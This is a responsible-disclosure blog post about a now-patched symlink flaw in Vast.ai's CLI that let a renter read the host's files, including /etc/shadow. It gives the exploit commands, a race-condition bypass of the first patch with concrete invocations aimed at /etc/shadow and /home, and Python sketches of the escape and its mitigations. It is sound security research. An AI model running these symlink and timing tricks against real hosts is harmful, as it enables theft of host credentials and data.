Symlink exploit in Vast.ai
https://docs.vast.ai/faq says “Clients are isolated to unprivileged docker containers and only have access to their own data.”
This is incorrect. By abusing symlinks, a malicious client can read every file on the host’s machine, including `/etc/shadow`.
That’s a quote from my email to Vast.ai, alerting them to the bug. (`/etc/shadow` contains the hash of every user’s password.)
Vast.ai promptly responded to that email, and the exploit is now patched.
If you downloaded any software binaries from a Vast.ai instance (which includes PyTorch `.pt` files; use safetensors instead), I recommend only running them in a sandbox.
(If you want to disclose a vulnerability to Vast.ai, go here.)
1. Discovery
Clients can use Vast.ai to rent time on GPU servers from hosts. I didn’t want to blow my compute budget, so I would stop my container while not running experiments. Normally when a container is stopped, you can’t do anything in it.
But Vast.ai’s command-line interface (CLI) allowed you to copy files to/from your container and run `ls`, even when the container was stopped.
I was curious how this worked. I (wrongly) thought that Vast.ai would temporarily activate the container, run `ls`, capture the output, and then stop the container. To test this, inside a running container I made a symlink inside the root directory, pointing up one more directory:
ln -s .. a_symlink
If you run `ls` on the symlink, it just shows you the contents of the root directory:
root@cfc6e2306b3a:/# ls /
a_symlink boot etc lib lib64 media opt root sbin sys usr
bin dev home lib32 libx32 mnt proc run srv tmp var
root@cfc6e2306b3a:/# ls a_symlink
a_symlink boot etc lib lib64 media opt root sbin sys usr
bin dev home lib32 libx32 mnt proc run srv tmp var
This is normal—the root directory is the top-most directory in that container, so if you try to look in the parent, you just get the root directory again.
(I’m simulating the bug using a container on my laptop—these are not real terminal outputs from Vast.ai.)
Then I used the Vast.ai CLI to run `ls` on that same symlink, and I got something different:
diff link lower merged work
Now the container’s root directory had a parent. This meant that the CLI’s `ls` was actually the host server’s `ls`, running outside the container’s sandbox.
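The effect can be reproduced locally with a small Python sketch. It builds a temporary directory whose entry names are copied from the output above, treats `merged` as the container's root (an assumption; the post does not say how Vast.ai laid out its storage), and lists the symlink the way a host-side process would. The function name `simulate_host_listing` is made up for illustration.

```python
import os
import tempfile

def simulate_host_listing():
    """List a container symlink from the host side of a fake layer directory."""
    with tempfile.TemporaryDirectory() as layer:
        # Hypothetical layout: names taken from the CLI output in the post.
        for name in ("diff", "merged", "work"):
            os.mkdir(os.path.join(layer, name))
        for name in ("link", "lower"):
            open(os.path.join(layer, name), "w").close()

        # Assumption: the container's root filesystem is the `merged` directory.
        container_root = os.path.join(layer, "merged")

        # Same symlink as in the post: /a_symlink -> ..
        os.symlink("..", os.path.join(container_root, "a_symlink"))

        # A host process resolves ".." against the real filesystem,
        # so the listing escapes `merged` and shows its parent.
        return sorted(os.listdir(os.path.join(container_root, "a_symlink")))

if __name__ == "__main__":
    print(simulate_host_listing())
    # ['diff', 'link', 'lower', 'merged', 'work']
```

Inside a real container the same symlink resolves to the container's own root, because the kernel will not walk above the process's root directory. The host process has no such boundary.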
If I remember correctly, the CLI had some basic sanitization: if you tried `ls ..`, it wouldn’t work. But symlinks weren’t checked.
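I don't know how Vast.ai's sanitization was actually implemented, so the following is only a sketch of the general failure mode: a check that inspects the text of a path rejects `..` but accepts a symlink that resolves to the same place. Both `naive_is_safe` and `resolved_is_safe` are hypothetical helpers written for this illustration.

```python
import os
import tempfile

def naive_is_safe(relative_path):
    """Textual check only: reject paths that contain a '..' component."""
    return ".." not in relative_path.split("/")

def resolved_is_safe(container_root, relative_path):
    """Resolve symlinks first, then require the result to stay under the root."""
    root = os.path.realpath(container_root)
    target = os.path.realpath(os.path.join(root, relative_path))
    return os.path.commonpath([root, target]) == root

def demo():
    with tempfile.TemporaryDirectory() as layer:
        container_root = os.path.join(layer, "merged")
        os.mkdir(container_root)
        os.symlink("..", os.path.join(container_root, "a_symlink"))
        return {
            "naive_dotdot": naive_is_safe(".."),          # blocked by the text check
            "naive_symlink": naive_is_safe("a_symlink"),  # slips through
            "resolved_symlink": resolved_is_safe(container_root, "a_symlink"),
            "resolved_root": resolved_is_safe(container_root, "."),
        }

if __name__ == "__main__":
    for name, allowed in demo().items():
        print(name, allowed)
```

Resolving the path before checking it catches the symlink, but a check like this is only valid at the instant it runs. That gap is what the timing attack in section 3 relies on.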
2. Mapping the exploit
I discovered that the CLI’s `copy` command also had the same bug: you could copy files from the host to your container. Then you could use `scp` or `rsync` as normal to copy the files off the server.
Normally there are limits to what files you can read on a Linux computer, even if you’re not in a sandbox. Users can make their sensitive files (e.g. SSH keys) readable only by themselves. But the CLI’s `copy` command was designed to work with files from stopped docker containers, and those live in `/var/lib/docker`. Only the root user can look inside `/var/lib/docker`. So the CLI’s `copy` had root permissions. Hence this exploit allows a malicious user to see even the protected files on the host machine.
I wasn’t able to manipulate files on the server that were outside of the container. But a determined hacker conceivably could have taken this attack further. From my email to Vast.ai:
It still may be possible for an attacker to gain shell access to some machines. For instance, the host may have used a less secure password that is easy to crack once you have access to `/etc/shadow`.
3. Patching the exploit
Vast.ai patched the exploit and asked me to check it was fixed. I found that a timing attack could get around their patch. They developed a second patch, and I confirmed that the exploit was now gone.
(This section is more technical and just describes the timing attack. Feel free to skip to the timeline.)
Here’s what I sent to Vast.ai about the timing attack:
Technical details on Exploit 2.0 [the timing attack]:
# Theory
There now appears to be a filter that blocks the original Exploit 1.0.
(I don't know exactly how the filter works, so some of the theoretical details here may be off.)
That is, the `ls`, `du`, and `copy` commands skip symlinks that would point to the host's data. Unfortunately there is a race condition in this filtering. A malicious client can create a file and rapidly change its state among:
(1) An ordinary file
(2) A directory
(3) An innocent symlink that stays within the client's data
(4) A malicious symlink that points at the host's data
(I haven't checked if all four of these states are necessary for the exploit.)
If the malicious client runs `copy` on this file, occasionally the following happens:
(1) the filter will see the file when it is in an innocent state
(2) the copy is approved
(3) the file changes to a malicious symlink
(4) the copy happens, leaking the host's data
This timing attack can be scripted to make it fairly reliable.
# Example: `ls /home`
On the rented instance, I ran
```
python3 mixed_entries.py folder2 foo ../../../../../../../../../../home/ --count 1000
```
Here `mixed_entries.py` is a script that creates a directory `folder2`, containing 1000 files. Each of these files cycles between:
(1) An ordinary file containing "spam"
(2) An empty directory
(3) An innocent symlink to `foo`
(4) The malicious symlink to `../../../../../../../../../../home/`
I've attached this script [to the original email, but not to this post. It's a simple script that Claude wrote.]
On my laptop, I ran
```
while true; uv run vastai execute 20047631 "ls -l /root/folder2/entry_0/"; echo iteration done; end
```
(Note this is a fish loop and will need slight modifications to run in bash.)
After running iterations for a few minutes, I received this output:
```
total 4
drwxr-xr-x 6 user user 4096 Nov 16 2023 user
```
This shows the host's `/home` contains a user called `user` (the client container I was inside did not have a user called `user`).
# Example: Accessing /etc/shadow
On the rented instance, I ran
```
python3 mixed_entries.py folder foo ../../../../../../../../../../etc/shadow --count 1000
```
On my laptop, I ran
```
uv run vastai copy 20047631:/root/folder 20047631:/tmp/target
```
After the copy completed, I examined `/tmp/target/folder` with `ls -Sl | head`. The host's `/etc/shadow` is larger than the fake files created by `mixed_entries.py`, so it should show up first. I looked at the first file (in my case `/tmp/target/folder/entry_111`), and it contained the contents of the host's `/etc/shadow` (e.g. an entry for `user`).
A malicious client would then work on cracking the host's password and obtaining shell access to the machine, or looking around for more sensitive information to copy.
Exploit 2.0 is slightly weaker than Exploit 1.0, since I didn't find a way to recursively copy directories and their contents (when I tried, I received a tree of directories, but none of their contents. I may have overlooked something). So this could mildly hinder a hacker who wanted to copy lots of data.
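The check-then-use gap described in the email can be shown deterministically in a few lines of Python. This is a sketch under stated assumptions, not a reconstruction of Vast.ai's filter or of `mixed_entries.py`: the helpers `is_inside`, `check_then_read`, and `read_without_following` are hypothetical, and the `between_check_and_use` callback stands in for the attacker winning the race.

```python
import os
import tempfile

def is_inside(root, path):
    """Return True if path, with symlinks resolved, stays under root."""
    root = os.path.realpath(root)
    return os.path.commonpath([root, os.path.realpath(path)]) == root

def check_then_read(root, path, between_check_and_use=None):
    """Vulnerable pattern: validate the path, then reopen it by name."""
    if not is_inside(root, path):
        raise PermissionError("path escapes the client's data")
    if between_check_and_use is not None:
        between_check_and_use()  # the entry changes state after the check
    with open(path) as f:
        return f.read()

def read_without_following(path):
    """Partial mitigation: refuse to open a final component that is a symlink."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd) as f:
        return f.read()

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        client = os.path.join(tmp, "client")
        os.mkdir(client)
        secret = os.path.join(tmp, "host_secret")  # stands in for host data
        with open(secret, "w") as f:
            f.write("host data")
        entry = os.path.join(client, "entry_0")
        with open(entry, "w") as f:
            f.write("spam")  # innocent state seen by the check

        def swap():
            # Replace the ordinary file with a malicious symlink.
            os.remove(entry)
            os.symlink(secret, entry)

        leaked = check_then_read(client, entry, between_check_and_use=swap)
        try:
            read_without_following(entry)
            blocked = False
        except OSError:
            blocked = True
        return leaked, blocked

if __name__ == "__main__":
    print(demo())
```

`O_NOFOLLOW` only guards the last path component, so it does not help when an intermediate directory is swapped for a symlink. On Linux 5.6 and later, `openat2` with `RESOLVE_BENEATH` is one way to make the kernel enforce containment during the open itself instead of in a separate check.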
4. Timeline
2025-03-18: I discovered that symlinks behaved weirdly
2025-03-22: I mapped the exploit
2025-03-22, 17:48: I sent an email to contact@vast.ai, support@vast.ai, and compliance@vast.ai, asking them how to securely send a description of the exploit.
2025-03-26: I hadn’t received a response yet, so I reached out to Vast.ai’s support chat to ask how to send the exploit. A Vast.ai engineer helpfully provided their official email.
2025-03-26, 10:27: I sent that engineer a description of the exploit.
2025-03-26, 19:37: Vast.ai reached out to me and confirmed they were working on a patch.
2025-04-01: I noticed that Vast.ai had disabled the CLI’s `ls` command (this mitigation may have happened before this).
2025-04-19: I noticed that the CLI’s `copy` command now didn’t work on symlinks pointing outside the container.
2025-05-10, 02:00: Vast.ai reported that the exploit was fixed and asked me to confirm.
2025-05-11: I investigated and found that a timing attack could get around the patch.
2025-05-12, 15:17: I reported this to Vast.ai.
2025-05-13, 17:22: Vast.ai confirmed they were working on a second fix.
2025-05-15: Vast.ai paid me a bug bounty.
2025-06-30, 21:16: Vast.ai reported that Exploit 2.0 was fixed and asked me to confirm.
2025-07-15, 22:45: I confirmed that I could no longer find an exploit. (The delay was my fault because I was on holiday.)
2025-07-24: Vast.ai agreed that this would be the disclosure date.
(All times are London time)
5. Acknowledgements
From February 3 to April 4, I was funded by the Pivotal Research Fellowship.